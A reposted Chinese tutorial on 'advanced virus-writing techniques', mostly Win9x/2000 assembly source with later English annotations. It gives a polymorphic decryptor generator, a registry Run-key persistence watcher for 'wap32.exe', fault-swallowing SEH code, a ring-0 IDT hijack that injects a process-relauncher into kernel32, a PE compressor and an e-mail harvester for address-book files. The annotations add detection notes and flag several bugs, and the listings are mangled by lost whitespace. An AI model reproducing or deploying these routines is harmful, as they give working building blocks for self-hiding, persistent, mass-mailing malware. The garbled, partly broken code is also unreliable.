
[转载]病毒的高级编写技巧

[转载]病毒的高级编写技巧

文章作者:whg

病毒的高级编写技巧
Author:whg
Email:whg@whitecell.org
Homepage:http://www.whitecell.org


1、超级病毒变形引擎

此段代码会在 DATA 段内生成一段解密代码并直接跳转执行。解密器写在可写的数据段里再被执行，正是 DEP/W^X 要阻止的行为，也是这类变形引擎的一个静态检测特征。

; --- Section 1: polymorphic decryptor generator ---
; MASM/TASM-style source. Whitespace was lost in extraction ("moveax,RndMima" is
; "mov eax,RndMima"); the text after the operands on the Rnd* lines is leftover comment.
; The notes below are analyst annotations describing what the code does; nothing is
; corrected or completed.
.586p
.modelflat,STDCALL
extrnExitProcess:proc
VirusSize=100h ; number of payload bytes the generated decryptor processes (256)
.data
; NOTE(review): DeCode/Encode are code and code-to-be placed in the writable .data
; section and later executed ("jmp DeCode" in @@Start). Executing from a data section is
; exactly what DEP/W^X stops, and is a usable static indicator for this family.

DecodeMethoddd? ; written by @@Start = RndCode AND 1: 0 = xor-based loop body, 1 = add-based
DeCode: ; decryptor stub entry
pushad
callEncode ; pushes the address of the buffer below as the return address = payload pointer
db100hdup(11h) ; 100h placeholder bytes standing in for the encrypted payload
Encode: ; @@Start writes the generated decryptor here, over the int3 filler
db100hdup(0cch)
RndReg0dd0eax ; register index 0..3 (eax,ebx,ecx,edx) used as the data pointer
RndReg1dd0ebx ; register index 0..3, chosen different from RndReg0; the byte counter
RndCodedd0RndCode ; selector bits, derived from RndMima by @@Start
RndMimadd60932561RndPassword ; 32-bit key ("mima" = password) patched into the decryptor

.code
; @@Start - assembles a randomised decryptor into the Encode buffer, then runs DeCode.
; Reads RndMima; writes RndCode, RndReg0, RndReg1, DecodeMethod and Encode[].
; Shape of the generated code (one template per step, picked by GetBxCode, each
; step consuming a fresh bit of RndCode through "ror RndCode,1"):
;   step0   reg0 = [esp]            return address left by "call Encode" = payload start
;   step1   reg1 = VirusSize        byte counter
;   loop:   step2  xor/add [reg0], key
;           step3  reg0 += 4
;           step4  reg1 -= 4
;           step5  jcc loop         rel8 displacement patched below
;   ret                             pops the payload address -> runs the decrypted bytes
; The copy loops below copy each template up to and including its 0CCh terminator and
; then step edi back one byte so the terminator is overwritten by the next template.
@@Start:
moveax,RndMima
roreax,7
movRndCode,eax ; RndCode = ror(key, 7)

moveax,RndCode
movecx,eax
andeax,011b ; RndReg0 = RndCode & 3
movRndReg0,eax
xorecx,RndMima
andecx,011b ; candidate RndReg1 = (RndCode ^ key) & 3
cmpeax,ecx
jnzshortChooseRegOk
incecx ; same register as RndReg0: take the next index, mod 4
andecx,011b
ChooseRegOk:
movRndReg1,ecx


movedi,offsetEncode ; edi = write cursor into the int3-filled buffer

rorRndCode,1
callGetBxCode,0,RndReg0,RndCode ; step 0: load the payload pointer into reg0
movesi,eax
ContFillStep0:
cld
lodsb
stosb
cmpal,0cch
jnzContFillStep0
decedi

rorRndCode,1
callGetBxCode,1,RndReg1,RndCode ; step 1: load VirusSize into reg1
movesi,eax
ContFillStep1:
cld
lodsb
stosb
cmpal,0cch
jnzContFillStep1
decedi

movebx,edi//计算机Jmp指令用
; ebx = address of the loop head (start of step 2), used for the back-jump below

rorRndCode,1
callGetBxCode,2,RndReg0,RndCode ; step 2: xor or add [reg0] with an imm32 placeholder
movesi,eax
ContFillStep2:
cld
lodsb
stosb
cmpal,0cch
jnzContFillStep2
decedi

moveax,RndMima
mov[edi-4],eax//填写随机密码
; the step-2 templates end in a 4-byte imm32 (12345678h); overwrite it with the real key
moveax,RndCode
andeax,01
movDecodeMethod,eax//填写DeCode方法
; record which variant step 2 used: GetBxCode picks xor (0) or add (1) from this same
; low bit of RndCode. Presumably the encryptor (not in this listing) applies the inverse.

rorRndCode,1
callGetBxCode,3,RndReg0,RndCode ; step 3: reg0 += 4
movesi,eax
ContFillStep3:
cld
lodsb
stosb
cmpal,0cch
jnzContFillStep3
decedi

rorRndCode,1
callGetBxCode,4,RndReg1,RndCode ; step 4: reg1 -= 4 (sets the flags tested by step 5)
movesi,eax
ContFillStep4:
cld
lodsb
stosb
cmpal,0cch
jnzContFillStep4
decedi

rorRndCode,1
callGetBxCode,5,RndReg0,RndCode ; step 5: conditional back-jump. Note the template group is
; indexed by RndReg0 although the flags come from reg1; the index only picks the mnemonic
movesi,eax
ContFillStep5:
cld
lodsb
stosb
cmpal,0cch
jnzContFillStep5
decedi

moval,0c3h
mov[edi],al//填写Ret指令
; append ret: pops the payload address pushed by "call Encode" and jumps into the payload

subebx,edi
mov[edi-1],bl//填写jmp指令
; rel8 = loop head - address after the jcc; replaces the "$" placeholder displacement.
; The generated body is a few dozen bytes, so the displacement fits in a signed byte.

int3;
; NOTE(review): a leftover development breakpoint; with no debugger attached this raises
; EXCEPTION_BREAKPOINT before the decoder ever runs.

jmpDeCode ; pushad, call Encode (the generated decryptor), which returns into the payload
ret
; GetBxCode(Step, Reg, Rnd) -> eax = address of an instruction template.
; The templates below form a table separated by int3 (0CCh) bytes: for each step 0..5
; and register index 0..3 there are two equivalent encodings, variant 0 and variant 1.
; index = ((Step*4 + Reg)*2 + (Rnd AND 1)); GetBxCodeAddr skips that many separators and
; returns the byte after the last one. Inferred constraint: no template may contain a
; 0CCh byte other than its terminator, since the scan stops at the first one it meets.
; "uses" saves ebx/ecx/edx/esi/edi; the assembler expands each "ret" into the epilogue.
GetBxCodeprocusesebxecxedxesiedi,Step:dword,Reg:dword,Rnd:dword
callGetBxCodeAddr ; pushes the table start (Step0_Eax) as the return address
; ---- step 0: reg = [esp], the return address pushed by "call Encode" (payload start) ----
Step0_Eax:
moveax,[esp]
int3;
popeax
pusheax
int3;
Step0_Ebx:
popebx
pushebx
int3;
pushdwordptr[esp]
popebx
int3;
Step0_Ecx:
movecx,[esp]
int3;
popecx
pushecx
int3;
Step0_Edx:
movedx,[esp]
int3;
movedx,esp
movedx,[edx]
int3

; ---- step 1: reg = VirusSize, written in obfuscated arithmetic forms ----
Step1_Eax:
moveax,VirusSize
int3
subeax,eax
addax,VirusSize+3081h ; ax = 3181h
subax,3081h ; ax = 100h
int3
Step1_Ebx:
movebx,VirusSize
int3
xorebx,ebx
orbx,VirusSize
int3;
Step1_Ecx:
subecx,ecx
xorecx,(VirusSizexor3181h)
xorecx,(3181h) ; ecx = VirusSize
int3;
movecx,0
andcx,VirusSize
; NOTE(review): 0 AND VirusSize is 0, so this variant loads a counter of 0, not 100h;
; the loop would then run until the counter wraps. Recorded here, not corrected.
int3
Step1_Edx:
andedx,0
xordx,(VirusSize-0281h) ; dx = 0FE7Fh
adddx,0281h ; dx wraps to 0100h
int3;
xoredx,edx
subedx,(0181h-VirusSize) ; edx = -81h
subedx,-0181h ; edx = 100h
int3;

; ---- step 2: [reg] op= imm32; the 12345678h placeholder is overwritten with the key by
; @@Start. Variant 0 = xor, variant 1 = add (the bit recorded in DecodeMethod) ----
Setp2_Eax:
xor[eax],12345678h
int3
add[eax],12345678h
int3
Setp2_Ebx:
xor[ebx],12345678h
int3;
add[ebx],12345678h
int3;

Setp2_Ecx:
xor[ecx],12345678h
int3;
add[ecx],12345678h
int3;
Setp2_Edx:
xor[edx],12345678h
int3;
add[edx],12345678h
int3;
; ---- step 3: reg += 4 ----
Step3_Eax:
addeax,4
int3
inceax
inceax
inceax
inceax
int3;
Step3_Ebx:
addebx,5
decebx
int3
addebx,2
addebx,2
int3;
Step3_Ecx:
subecx,-4
int3
subecx,-5
dececx
int3;
Step3_Edx:
incedx
subedx,-3
int3
addedx,04
int3;

; ---- step 4: reg -= 4; the final instruction's flags are what step 5 tests ----
Step4_Eax:
subeax,4
int3
deceax
deceax
deceax
subeax,1
int3;
Step4_Ebx:
decebx
subebx,3
int3;
decebx
decebx
subebx,2
int3;
Step4_Ecx:
addcx,123
subcx,123+4 ; net -4, done in 16-bit ops
int3
subcx,-4
deccx
subcx,7 ; +4 -1 -7 = -4
int3
Step4_Edx:
subdx,2
decdx
subdx,1
int3
incedx
subdx,5
int3;
; ---- step 5: conditional back-jump; "$" is a placeholder displacement patched by @@Start ----
; NOTE(review): every step-4 variant ends with a subtraction that yields 0 with no borrow
; on the last legitimate pass. jnz/ja/jg then fall through, but jnb (below, group 1
; variant 1) and jnl (group 2 variant 0) are taken on a zero result, so those choices
; appear to run one extra iteration over the 4 bytes following the payload, i.e. the
; start of the decryptor itself. Recorded here, not corrected.
Step5_Eax:
jnz$
int3
ja$
int3
Step5_Ebx:
jg$
int3
jnb$
int3
Step5_Ecx:
jnl$
int3
jnz$
int3
Step5_Edx:
ja$
int3
jg$
int3

GetBxCodeAddr:
popesi ; esi = address of Step0_Eax (start of the template table)
moval,0cch//指令分割符
; al = 0CCh, the separator byte between templates
movecx,Step
shlecx,1
shlecx,1 ; ecx = Step*4
addecx,Reg//计算机得到的指令位置
shlecx,1 ; ecx = (Step*4 + Reg)*2
andRnd,01b ; only the low bit of the passed selector matters
addecx,Rnd ; + variant
jcxzshortGetBxCodeOver ; index 0: the very first template, nothing to skip
ContFindCode:
pushecx
ContFindCC:
incesi
cmp[esi],al ; advance to the next 0CCh
jnzContFindCC
popecx
loopContFindCode ; skip "index" separators in total
moveax,esi
inceax ; eax = first byte after the last separator skipped
ret
GetBxCodeOver:
moveax,esi
ret
GetBxCodeendp


end@@Start


2、Windows9x/2000/xp锁定注册表

; --- Section 2: pin an autorun value in the registry (Win9x/2000/XP) ---
; Indicators: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value "wap32" = "wap32.exe".
; The "$1$" sequences are extraction artefacts standing in for the string quotes.
.586p
.modelflat,STDCALL
.data

HKeyStrdb$1$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$1$,0 ; subkey, opened under HKLM (80000002h)
ValueNamedb$1$wap32$1$,0 ; REG_SZ value name
PathNamedb$1$wap32.exe$1$,0 ; value data; RegSetValueExA below is told it is 100h bytes long

.code

extrnRegOpenKeyA:proc
extrnRegSetValueExA:proc
extrnRegCloseKey:proc
extrnExitProcess:proc
extrnRegNotifyChangeKeyValue:proc
extrnCreateThread:proc
extrnSleep:proc
extrnRegQueryValueExA:proc

; start - opens HKLM\...\Run, writes wap32 = wap32.exe, starts a watcher thread that
; re-writes the value whenever the key changes, then idles for three minutes.
; "call proc,arg,..." is the TASM-style extended call: arguments are pushed right to left.
start:
pusheax ; reserve a dword on the stack to receive the HKEY
callRegOpenKeyA,080000002h,offsetHKeyStr,esp ; HKEY_LOCAL_MACHINE; requires write access to the Run key
popebx ; ebx = hKey. No status check: on failure ebx holds whatever eax was
callRegSetValueExA,ebx,offsetValueName,0,01,offsetPathName,100h
; type 1 = REG_SZ; cbData = 100h (256) although the string is 10 bytes, so the bytes
; of .data following PathName are stored in the registry as well

subesp,100h ; 256-byte scratch buffer
moveax,esp
push100h ; lpcbData = 100h
callRegQueryValueExA,ebx,offsetValueName,0,0,eax,esp
popeax
addesp,100h ; the value read back is never looked at

pusheax ; dword for lpThreadId
callCreateThread,0,0,offsetRegProtectProc,ebx,0,esp ; thread parameter = hKey
popeax
callSleep,1000*60*3 ; three minutes, then the primary thread returns
ret

; RegProtectProc(hKey) - watcher thread. Reads the current "wap32" value into a 256-byte
; stack buffer, then loops forever: block in RegNotifyChangeKeyValue until a value under
; the key is changed, then immediately write the saved value back.
; Detection note: a process that sits in RegNotifyChangeKeyValue on the Run key and
; answers every notification with RegSetValueExA on the same value is this pattern.
; Uses ebx/esi/edi without saving them; it never returns, so that is moot here.
RegProtectProcprochKey:dword
movebx,hKey
subesp,100h
movedi,esp ; edi -> 256-byte buffer holding the value data
callGetProtectKeyName ; pushes the address of the inline string below
db$1$wap32$1$,0
GetProtectKeyName:
popesi ; esi -> "wap32"
push100h ; lpcbData
callRegQueryValueExA,ebx,esi,0,0,edi,esp ; snapshot the value into the buffer
popeax
WaitRegChangeNotify:
callRegNotifyChangeKeyValue,ebx,0,4,0,0
; bWatchSubtree = 0, filter 4 = REG_NOTIFY_CHANGE_LAST_SET, no event, synchronous:
; returns only after something under the key was set
callRegSetValueExA,ebx,esi,0,01,edi,100h ; REG_SZ, 100h bytes from the buffer
jmpshortWaitRegChangeNotify ; re-arm and wait again; no exit path
RegProtectProcendp

endstart



3、Windows9x/2000意外处理通用程序


此段程序通过自行安装的 SEH 处理函数把异常当作可继续执行来处理，从而达到屏蔽程序错误的效果。

; --- Section 3: swallowing faults with a hand-rolled SEH frame (Win9x/2000) ---
; "include wap32.inc" is the author's own include (not shown); it presumably defines
; cx_Eip, the EIP field of the CONTEXT record referenced in Exception below.
includewap32.inc

.386p
.modelflat,stdcall

extrnMessageBoxA:proc
extrnExitProcess:proc

.data

Msgdb$1$Fuck$1$,0 ; text shown after the fault is suppressed ($1$ = mangled quotes)

; The helpers below are code placed in the .data section (runnable only where DEP is
; absent). Their Chinese tail comments lost the ";" in extraction; English notes follow.
; SetSehFrame - called with ecx = address to resume at after a fault.
;   Leaves on the stack, top down: [saved slot][previous fs:[0]][handler][resume ecx]
;   and links esp+4 (prev, handler) as the new EXCEPTION_REGISTRATION at fs:[0]. The
;   current esp is also stored in GetEspAddr's slot so ClearSehFrame can find the frame
;   whatever the stack looks like when it is called.
; ClearSehFrame - undoes that: restores the slot, unlinks fs:[0], returns ecx = resume address.
; NOTE(review): the handler pointer refers to code in .data. On later Windows, DEP and the
; SEH hardening (SafeSEH/SEHOP) constrain this trick; the 9x/2000 target in the heading is
; where it works as written.
SetSehFrame:ecx=忽略错误继续执行地址
popeax弹出返回地址
; eax = caller's return address
pushecx保存忽略错误继续执行地址
; keep the resume address
callPushExceptionProc
; pushes the address of the next line ("jmp short Exception") = the handler pointer
jmpshortException
PushExceptionProc:
pushfs:dwordptr[0]
; previous handler; with the handler pointer just above it this is the SEH record
movfs:[0],esp
; install the record at the head of the chain
callGetEspAddr
; edx -> dword slot inside GetEspAddr
pushD[edx]保存原Esp地址值
; save the slot's old content (allows nesting)
mov[edx],esp
; slot = current esp
jmpeax
; back to the caller
ClearSehFrame:
popeax弹出返回地址
; eax = caller's return address
callGetEspAddr
movesp,[edx]
; esp = position recorded by SetSehFrame, regardless of where the fault left esp
popD[edx]恢复原Esp地址值
; restore the slot's previous content
popfs:dwordptr[0]
; unlink our handler
popecx
; discard the handler pointer
popecx弹出忽略错误继续执行地址
; ecx = resume address, handed back to the caller
jmpeax

; Exception(pRecord, pFrame, pContext, pDispatch) - the SEH handler itself.
; Sets the faulting CONTEXT's EIP to "call ClearSehFrame" below and returns 0
; (ExceptionContinueExecution), so the OS resumes there: the frame is torn down and
; control jumps to the resume address in ecx. No exception code is inspected: every
; exception reaching this frame is swallowed.
ExceptionprocpRecord,pFrame,pContext,pDispatch
callPushSehBackProc ; pushes the address of the next line as the new EIP
callClearSehFrame ; executed only after the OS resumes here; returns ecx = resume address
jmpecx
PushSehBackProc:
popecx ; ecx = address of "call ClearSehFrame"
moveax,pContext
mov[eax.cx_Eip],ecx ; patch CONTEXT.Eip
xoreax,eax忽略错误继续执行
; eax = 0 = ExceptionContinueExecution
ret
; the assembler expands this ret into the proc epilogue, so it returns from Exception
; itself (the PushSehBackProc return address was already popped into ecx)
Exceptionendp

; GetEspAddr - returns edx = address of the dword embedded after the call below, a tiny
; position-independent global in which SetSehFrame remembers the frame's esp.
GetEspAddr:
callPushOffsetEspAddr ; pushes the address of the dd below as the return address
dd? ; storage: esp of the active SetSehFrame frame
PushOffsetEspAddr:
popedx
ret


.code
; Start - demonstration: arm the frame with the MessageBoxA line as resume address, then
; fault on purpose by writing to address 0. The handler redirects execution to the
; MessageBoxA line as if nothing happened. The "call ClearSehFrame" in PushErrorProc is
; the no-fault path and is never reached here.
Start:
callPushErrorProc ; pushes the address of the next line = resume point
callMessageBoxA,0,offsetMsg,offsetMsg,0
ret
PushErrorProc:
popecx ; ecx = resume address
callSetSehFrame
movds:[0],eax ; deliberate access violation
callClearSehFrame ; not reached after the fault (the handler jumps to ecx instead)
ret


endStart



4、Windows9x下进程不死术

此段程序首先实现Win9x下注入远程线程(新技术)
然后与Win2k下进程不死术一样了。
; --- Section 4: "immortal process" on Windows 9x ---
; Copies a watcher routine into kernel32's shared memory (hard-coded 9x base 0BFF70000h)
; through an IDT patch and runs it with the undocumented CreateKernelThread, so it
; outlives the host process and relaunches c:\wap32.exe when the host dies.
; None of this carries over to NT-family Windows: the IDT is not writable from ring 3
; and the kernel32 address is 9x-specific.
includeWin32.inc

.386p
.modelflat,stdcall

extrnGetProcAddress:proc
extrnWinExec:proc
extrnMessageBoxA:proc
extrnSleep:proc
extrnGetCurrentProcessId:proc
extrnOpenProcess:proc
extrnGetCurrentProcess:proc
extrnWriteProcessMemory:proc
extrnGetExitCodeProcess:proc

.data

;问题,要Sleep()这样做使Kernel32有机会更新数据
; (author's note above: "problem - a Sleep() is needed so kernel32 gets a chance to
; update its data")
; KnlThread(ProcID) - position-independent watcher meant to run as a kernel thread.
; Each API it needs is reached through a dword slot embedded right after a call
; ("call X / dd ? / X: pop eax"), filled in by Start before the copy, so the code works
; at any address; ProcID is read via the assembler-generated ebp frame.
; Flow: OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcID) -> WaitForSingleObject(h, INFINITE)
; -> WinExec("c:\wap32.exe", 1). The process handle is never closed.
; PROCESS_ALL_ACCESS / FALSE are expected to come from Win32.inc (not shown).
KnlThreadprocProcID:dword
callGetKnlOpenProcess
KnlOpenProcessdd? ; filled with GetProcAddress(kernel32, "OpenProcess")
GetKnlOpenProcess:
popeax ; eax -> the slot
call[eax],PROCESS_ALL_ACCESS,FALSE,ProcID
oreax,eax
jzshortExitProtectProc ; host process could not be opened: give up
movebx,eax ; ebx = process handle
callGetKnlWaitForSingleObject
KnlWaitForSingleObjectdd?
GetKnlWaitForSingleObject:
popeax
call[eax],ebx,-1h ; INFINITE: block until the watched process terminates
callGetFileNameAddress
GetFileNameAddress:
popecx
addecx,offsetFileName-offsetGetFileNameAddress ; ecx -> FileName, computed relative to our own location
callGetKnlWinExec
KnlWinExecdd?
GetKnlWinExec:
popeax
call[eax],ecx,01 ; relaunch c:\wap32.exe, nCmdShow = 1
ExitProtectProc:
ret
KnlThreadendp

; Strings. FileName is addressed relative to KnlThread, so it has to sit inside the bytes
; that get copied along with it. The remaining strings are only used by GetProcAddress.
FileNamedb$1$c:\wap32.exe$1$,0 ; path relaunched by the watcher (indicator)

KnlOpenProcessStrdb$1$OpenProcess$1$,0
KnlWaitForObjectStrdb$1$WaitForSingleObject$1$,0
KnlWinExecStrdb$1$WinExec$1$,0
KnlSleepStrdb$1$Sleep$1$,0 ; declared but not resolved anywhere in this listing
KnlCreateKnlThreadStrdb$1$CreateKernelThread$1$,0 ; undocumented kernel32 export on 9x

.code
; Start - resolves the three kernel32 exports KnlThread needs and stores them in its
; slots, copies 100h bytes into kernel32 at 0BFF70600h (ring-0 copy, see MoveDataToKnl),
; then spawns the copy as a kernel thread with the current PID as parameter.
; NOTE(review): the copy source is "offset Start" (this routine), not "offset KnlThread",
; although KnlThread is the routine written to be relocatable and CreateKernelThread is
; pointed at the copy. This looks like a mismatch in the posted code; left as-is.
Start:
callGetProcAddress,0bff70000h,offsetKnlOpenProcessStr ; 0BFF70000h = kernel32 base on 9x, used as the HMODULE
movKnlOpenProcess,eax
callGetProcAddress,0bff70000h,offsetKnlWaitForObjectStr
movKnlWaitForSingleObject,eax
callGetProcAddress,0bff70000h,offsetKnlWinExecStr
movKnlWinExec,eax

callMoveDataToKnl,offsetStart,0bff70600h,100h ; write 100h bytes into kernel32's image

callGetProcAddress,0bff70000h,offsetKnlCreateKnlThreadStr
movebx,eax ; ebx = CreateKernelThread (no NULL check)
callGetCurrentProcessId
pusheax ; dword to receive the thread id
callebx,0,0,0bff70000h+600h,eax,0,esp ; arguments laid out like CreateThread (assumed): start = the copy, param = our PID
popeax
callMessageBoxA,0,offsetFileName,offsetFileName,0
ret

; MoveDataToKnl(Src, Des, nCx) - copies nCx bytes to an address user mode may not write,
; by briefly hijacking the int 3 IDT entry (Win9x leaves the IDT writable from ring 3).
;   1. sidt -> IDT base; eax -> gate for vector 3; its two dwords are saved in ebx:edx
;   2. "call SetIdt03" pushes the address of the "pushad" below; SetIdt03 pops that
;      address as two words straight into the gate's offset fields (bytes 0-1 and 6-7).
;      Only the offset changes, so the gate keeps its original selector/DPL, which is
;      what lets a ring-3 "int 3" land in the new code at ring 0.
;   3. int 3 enters at "pushad": restore the gate, rep movsb, iret
;   4. back in SetIdt03 after the iret: sti, then ret (expanded into the proc epilogue)
; cli/sti from ring 3 rely on the 9x environment accepting them.
MoveDataToKnlprocusesebxesiedi,Src:dword,Des:dword,nCx:dword
pusheax
sidt[esp-2] ; 6-byte IDTR image: limit at esp-2, base at esp..esp+3
popeax ; eax = IDT base
addeax,3*8 ; descriptor for vector 3
movebx,[eax]
movedx,[eax+4] ; original gate, put back from inside the handler
callSetIdt03
pushad ; ---- entered at ring 0 through the patched gate ----
mov[eax],ebx
mov[eax+4],edx ; restore the original int 3 gate
cld
repmovsb ; esi/edi/ecx were loaded in SetIdt03
popad
iret ; ---- back to ring 3, to the instruction after "int 3" ----
SetIdt03:
cli
popW[eax] ; low word of the pushed address -> gate offset 15:0
popW[eax+6] ; high word -> gate offset 31:16; the return address is now consumed
movesi,Src
movedi,Des
movecx,nCx
int3; ; trigger the hijacked vector
sti
ret
MoveDataToKnlendp

endStart


5、简单算法,高效率压缩PE文件

; --- Section 5: small compressor (zero-run encoding) for a PE file ---
.586p
.modelflat,STDCALL
.data

OldFiledb$1$pe.exe$1$,0 ; input
NewFiledb$1$pe.zzz$1$,0 ; output

FileDatadb0,0 ; 2-byte I/O scratch: byte 0 = current input byte, byte 1 = run length
.code
extrn_lopen:proc,_lcreat:proc
extrn_lread:proc,_lwrite:proc
extrn_lclose:proc
extrnExitProcess:proc
; start - encodes OldFile into NewFile one byte at a time:
;   non-zero byte        -> emitted unchanged
;   run of n zero bytes  -> emitted as 00 nn (1 <= n <= 0FFh; longer runs are split)
; A literal 00 never appears alone, so the stream is decodable; the decoder is not part
; of this listing. Registers: esi = input HFILE, edi = output HFILE, ebx = pending run.
; No _lwrite result is checked, and every input byte costs one _lread call.
start:
call_lopen,offsetOldFile,0 ; OF_READ
cmpeax,-1 ; HFILE_ERROR
jzExitProc
movesi,eax
call_lcreat,offsetNewFile,0
cmpeax,-1
jzCloseOldFile
movedi,eax

xorebx,ebx ; length of the zero run not yet written
ReadData:
call_lread,esi,offsetFileData,1
oreax,eax
jzshortReadOver ; 0 bytes read = end of input
movzxeax,FileData
oreax,eax
jnzshortNoZero
incebx ; one more zero
cmpebx,0ffh
jnzshortReadData ; keep counting until the run reaches 0FFh
xoreax,eax
movah,bl ; ax = run length << 8 | 00
xchgax,wordptrFileData ; FileData = 00 nn
call_lwrite,edi,offsetFileData,2
xorebx,ebx
jmpshortReadData
NoZero:
orebx,ebx
jnzshortNoZeroData
call_lwrite,edi,offsetFileData,1 ; no pending run: write the literal
jmpshortReadData
NoZeroData:
pusheax ; keep the literal while the run is flushed
xoreax,eax
movah,bl
movwordptrFileData,ax ; 00 nn
call_lwrite,edi,offsetFileData,2
xorebx,ebx
popeax
movFileData,al ; then the literal itself
call_lwrite,edi,offsetFileData,1
jmpReadData
ReadOver:
orebx,ebx
jzshortCloseFile
xoreax,eax ; flush a run that ran into EOF
movah,bl
xchgax,wordptrFileData
call_lwrite,edi,offsetFileData,2
xorebx,ebx
CloseFile:
call_lclose,edi
CloseOldFile:
call_lclose,esi
ExitProc:
callExitProcess,0

endstart

6、提取Windows地址薄文件(*.WAB)的Email信息

; --- Section 6: harvest e-mail addresses from a Windows Address Book (*.WAB) file ---
; This is the address-collection step of a mass mailer; a process reading *.WAB files it
; has no business with is a detection opportunity.
.586p
.modelflat,STDCALL
.data

MailFiledb$1$My.WAB$1$,0 ; input file, relative path ($1$ = mangled quotes)

.code

extrn_lopen:proc,_lcreat:proc
extrn_lread:proc,_lwrite:proc
extrn_llseek:proc
extrn_lclose:proc
extrnMessageBoxA:proc
extrnExitProcess:proc
extrnWideCharToMultiByte:proc

; start - reads the first 100h bytes of the WAB file, takes the dword at +60h as the
; file offset of the Unicode name table and the dword at +64h as its entry count (the
; author's reading of the format; not verified here), then for each 44h-byte record
; converts the leading UTF-16 string to ANSI and shows it in a message box.
start:
call_lopen,offsetMailFile,0 ; OF_READ
cmpeax,-1
jzshortExitProc
movebx,eax ; ebx = HFILE
subesp,100h
movedi,esp ; edi -> 256-byte buffer: header first, then one record at a time
call_lread,ebx,edi,100h
cmpeax,100h
jnzshortCloseFile ; short header: give up
moveax,[edi+60h]得到Unicode邮件名偏移
; eax = offset of the Unicode name table
call_llseek,ebx,eax,0 ; FILE_BEGIN
movecx,[edi+64h]得到Unicode邮件名个数
; ecx = number of entries
; NOTE(review): "loop" decrements before testing, so a count of 0 wraps to 0FFFFFFFFh
; iterations; there is no zero check
ContWabMail:
pushecx
call_lread,ebx,edi,44h读一个记录
; read one 44h-byte record
cmpeax,44
; NOTE(review): compares the bytes read with decimal 44 (not 44h) and no branch follows,
; so a short read is never detected; a truncated file just converts stale buffer bytes.
subesp,100h ; output buffer for the ANSI string
moveax,esp
callWideCharToMultiByte,0,200h,edi,-1,eax,100h,0,0 ; CP_ACP, WC_COMPOSITECHECK, NUL-terminated source
moveax,esp
callMessageBoxA,0,eax,eax,0
addesp,100h
popecx
loopshortContWabMail
CloseFile:
call_lclose,ebx
ExitProc:
callExitProcess,0

endstart

